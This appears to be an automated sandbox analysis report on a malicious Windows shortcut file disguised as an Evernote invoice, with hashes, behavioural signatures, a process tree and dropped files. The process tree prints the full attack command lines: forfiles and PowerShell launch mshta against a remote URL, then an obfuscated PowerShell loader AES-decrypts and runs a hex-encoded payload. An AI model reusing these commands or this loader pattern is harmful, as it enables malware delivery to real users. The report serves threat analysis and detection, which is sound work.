Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
17-05-2024 01:39
Static task
static1
Behavioral task
behavioral1
Sample
84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk
Resource
win10v2004-20240508-en
General
-
Target
84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk
-
Size
148KB
-
MD5
d39a73de9f109e3dba408e9481998206
-
SHA1
30651dada81443db0fde9c3a336955d27b6d9024
-
SHA256
84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30
-
SHA512
09c8954ecabbeb36aeb8804858168eb1448f5894c1641a1ba5311f2b33aaeb24814734d0b1f7e777f22910c53bb9df500801907a603d8d71fba139705f444d61
-
SSDEEP
24:8WEe6Dz358m+pyAWkr+/4x+sPxZvBG0qdd79ds/Z6U/ab9Q9qFBm:8WENDzKvZbnvBG7dJ9A6U/a5QW
Malware Config
Extracted
https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exepowershell.exeflow pid process 4 2688 mshta.exe 7 2688 mshta.exe 8 2400 powershell.exe -
Downloads MZ/PE file
-
Drops file in Windows directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2652 powershell.exe 2400 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
AcroRd32.exepid process 2492 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2652 powershell.exe Token: SeDebugPrivilege 2400 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
AcroRd32.exepid process 2492 AcroRd32.exe 2492 AcroRd32.exe 2492 AcroRd32.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
cmd.exeforfiles.exepowershell.exemshta.exepowershell.exedescription pid process target process PID 2224 wrote to memory of 2668 2224 cmd.exe forfiles.exe PID 2224 wrote to memory of 2668 2224 cmd.exe forfiles.exe PID 2224 wrote to memory of 2668 2224 cmd.exe forfiles.exe PID 2668 wrote to memory of 2652 2668 forfiles.exe powershell.exe PID 2668 wrote to memory of 2652 2668 forfiles.exe powershell.exe PID 2668 wrote to memory of 2652 2668 forfiles.exe powershell.exe PID 2652 wrote to memory of 2688 2652 powershell.exe mshta.exe PID 2652 wrote to memory of 2688 2652 powershell.exe mshta.exe PID 2652 wrote to memory of 2688 2652 powershell.exe mshta.exe PID 2688 wrote to memory of 2400 2688 mshta.exe powershell.exe PID 2688 wrote to memory of 2400 2688 mshta.exe powershell.exe PID 2688 wrote to memory of 2400 2688 mshta.exe powershell.exe PID 2400 wrote to memory of 2492 2400 powershell.exe AcroRd32.exe PID 2400 wrote to memory of 2492 2400 powershell.exe AcroRd32.exe PID 2400 wrote to memory of 2492 2400 powershell.exe AcroRd32.exe PID 2400 wrote to memory of 2492 2400 powershell.exe AcroRd32.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. mshta https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice4⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function NDkpzB($PbutE){return -split ($PbutE -replace '..', '0x$& ')};$FgMPQtR = NDkpzB('3D2E22BEE13CCFE8B668DFE3870189AB65FC83A106ED0669AD4641C874CEFC917EC535ADDF89DF1FC0D291409C73E835B9F5E70CF0828A29B1A99FCA6F796F2A42503EAD3E20FB474BFCCBC35604C7DF567229A99309C37991C3C06D087F748ACC4BC05F5B87FDD9577382DC5E78E9AF8F258959DBD417148594A4E69F30F8BA09721A811C9154BF4F46C61B027E5E341F93E46D8A20C8C29F4EC25E5C686A83F3F134C5E02359C71996DDDA3CB61DC08A2EB6BE0D3BB39C00E9CD6C5B8E50425065FA05BE50EB58A186392882ABB24FD4D0628687F1E075817F6E330DC872782EC8EF3270D119F3F1EC86C7C67AB9FD26BF831DFCD080EFE275AD185384E578FB6FF21965BEBABF3D61F1298B71AA9FC44837B82550CF83C1CA66CF07FDD34B3A36310A571FD186CAA02874D83D539F0ED9044B8229A424D9B6082A7ACC921F90904F4DF72C046C6FD1C5F33D9111995AAD7C1C1DD1C2AB1663495AD4FA4A076957D6C02EA68AC2E44CCE5221002CB17CB5CE00989546834D261F7C9FEAF275945B6288E36BE0499F62C619DD95E5D74BCE21A67C9B3D7086F8A2BC180BC93D234878A2B0DE6149370967764D9A43A5B369191F8CA07CDA7F4C04EEA417515BBE36A47DB3F155508C8C012037E01E725505EA2CEF9DC3452A26D6CCCEEB8F53AB4E584DB03063509EDC34BD1631BC0D85131CD09FF34CB6F59C256EE3A3F103404A0F88BEE10B6013EBA9B9A71B168C53B1500E3EE8F5E3D826118E292F0BD55FDD0C5D4926161CC7FE9FB046F7A7A4BE387BF2C9A4CD81588044BB525721950179CD20BC45EDCF86DACC2D05515E4A58A7D4607A73C70D16BB5DF70BD51F26556B2B75F712CF6B33D805188BE16B94E6CF59787C2CAD2624B8DE1F1FD6555ADCD6B087438FE541F4E496F6A1A54088B41117481113DF53DEE84CA74EE438A319B822416D96A624AB4ADA351565AB1AB7910CB458083883D052E81D58BBD45FA51B2A392F60088ACC43D43965E09E3999B124A4D99742762C29FEE7420F1FEBEAA69BE53723E7C83A1A0A9AB74BD3474822C6D09A38219121F97EB315CC6A97AFFD96443F43BCCB405282E5D5F8C2E1607082372440DB310E54573087CA2C07CAD48324AAA6D911A31EBE54BC246CC77D449E0209925602A237BE857173875FF7CBDF566A584855FA36E7BA974C49E4AC6BA71F637954D6EC82596875886BD35B62A9C41EA16912E81F4625EFFEE2F5FCD66832EF3C439A748C8E6AA5C50B2992CA202119B2EBDB95ECE163FC8FF7B0501C611AFDCD510A004DE882C79B433EDD9B890926856A227E5785BA964677F025837F0C62EF77D4C9D609518E415D6DDC2396A5839D383F6432318DE07919F442E2D5D455313D4A5E6414B3670D6DA8A746844B6475984E7DC5722645FAE5C2734D64606B25DD735043ABF19ACE1D00CF1455D8DCB263FE49FF6DAF30B1D278A2B024AAFA5CD490FA75A3500718CB6C2D733C645F1D96145E4F47C3B9FFAB0A80D4806F9597AB6C16648E27BAE0DBAFEBCA1B9FC9CB65F38A195E4BF3C914D7EB77DF41FEBED9252B7AA6D055220D9B1BE5316F0934D2ACF837572E54605BB44920BC30963D120BE37D1424FC57F0BC5A94530924D42DB1D03E2DF2E25F9425495C81589DAB9FE1139AE45431DCCDE27404986F8ED2458E7515A420D2F40D110D146A7F3E0566F550A052B46A6AC139EBE3CC41082CAE82EC5846FEC3099D033661D49805ED48FE4F019ECC22D5684A78CE7960DA71ED832792147A535401F1498FAE1C2C4FAECFB4DA3EBF98E01C1B81D841AA94083C26C2E7AC676E83180756C3EC3BA39F08A527D5CA7063EA91228B210D40DA1428F93986B13C10BF132D27C85801CC49F8598B105227DB80FF777FB78B8D6537584E244FF98133C299B3DCD20BE4D4BEA88D068CDBD84F54F0E419FF9F730F7FC17BB140848191A0AE77DC3182584C1F0BBA1EFE230BA6F9BD64622D0EBB1B60D55C6DD5141BD03DC8E385CF9AD75D8CE161AD6433E790579D4C316320D3BF9B609ED9BC810E661092B5D2F824ECD168E1A288B1EC23A230DFEBD019DC175FE02FB070676A7482EAC99F984A1B33F24A05624DD8E8FE3B261186010881F43CBA3AF8581D0B62D6FD371276A0A6AC713BBF10E63835C647C6808C475CFDA4B5362CFB4709875D7C86AD7B698CE71A069C32FE65523E8D3E8C40DE1149F66CD1B651698F41D98DB91312BD04A1E012D728C2FB120EB74CFF9F93D064E541C8953EE17AAD25F9A2CE3116796F26552CF5C7F08B1B73411CB6622FBFC3A56EA8D19B6513611D36C25F7AC9428174BCC5D619DB2C87759D6E0C291582A50C887CD0E72F242760BC721B1271E4732B1FBEF23833AA9EE322D775365EDD7D0C2AF9E01C3492F003338D21E90287');$UcouF = [System.Security.Cryptography.Aes]::Create();$UcouF.Key = NDkpzB('415450574E64494F4F6C5A7742707268');$UcouF.IV = New-Object byte[] 16;$seVZtfGD = $UcouF.CreateDecryptor();$mamDBHAHL = $seVZtfGD.TransformFinalBlock($FgMPQtR, 0, $FgMPQtR.Length);$bZUJiekdW = [System.Text.Encoding]::Utf8.GetString($mamDBHAHL);$seVZtfGD.Dispose();& $bZUJiekdW.Substring(0,3) $bZUJiekdW.Substring(3)5⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Evernote-Supplemental-Terms.pdf"6⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEventsFilesize
3KB
MD5408e13d3f9eb2f9cdf51c7818b172712
SHA1248d573ec1887dad21a337759a24abd3234a447f
SHA256f79ef94e981079f9e1f4cdd8305404564174bc120e45bea9e9fad643137b6411
SHA5125f436bc3ceb5faf6acd6fb718479efff358e254381f31e6808b7a3d6f67643ffb17e6bc66423ad9dda972a410c5c9d27436fe7798573a8303e1f721fbfde864e
-
C:\Users\Admin\AppData\Roaming\Evernote-Supplemental-Terms.pdfFilesize
70KB
MD5508c98b92beb1aac53108149273aeb18
SHA1434698e85e6bf7e1989212ce99d3b3e0a6b5171d
SHA256861b8186ac5e7157ff17abe83c9aff3856113d43adf3bae520f93d75940c9c46
SHA51208dfe9c8809bbf0ff03add0025a29e23834b9f37f926c1b9646e5cf217e690cd77872df90a8b2a71f18beb9334a547aa0eb2d26c1fcc423f95e1c19ee42d932f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FKSCWYTRHOE7CPNV6V8W.tempFilesize
7KB
MD581256cae7a194d4011afd5eeb02fe918
SHA1ac0de0ab1149d05446268d9fa93f6bdcf03c5546
SHA256dbe07ee03f5b24db883f46be83d9432b491feb6926fecc8a528255300ec0ed1b
SHA5124585c9450a27147a109af8aa570e50260fdd574693103a112c6879d3e808650298f0b5758fb7e700d56c03fa75bdee71a61f66aa71eb4f8bb36a8b4516e5d8de
-
memory/2400-68-0x000000001B4A0000-0x000000001B782000-memory.dmpFilesize
2.9MB
-
memory/2400-69-0x0000000002810000-0x0000000002818000-memory.dmpFilesize
32KB
-
memory/2652-40-0x000007FEF5A5E000-0x000007FEF5A5F000-memory.dmpFilesize
4KB
-
memory/2652-41-0x000000001B6C0000-0x000000001B9A2000-memory.dmpFilesize
2.9MB
-
memory/2652-42-0x00000000026F0000-0x00000000026F8000-memory.dmpFilesize
32KB
-
memory/2652-43-0x000007FEF57A0000-0x000007FEF613D000-memory.dmpFilesize
9.6MB
-
memory/2652-44-0x000007FEF57A0000-0x000007FEF613D000-memory.dmpFilesize
9.6MB
-
memory/2652-45-0x000007FEF57A0000-0x000007FEF613D000-memory.dmpFilesize
9.6MB
-
memory/2652-46-0x000007FEF57A0000-0x000007FEF613D000-memory.dmpFilesize
9.6MB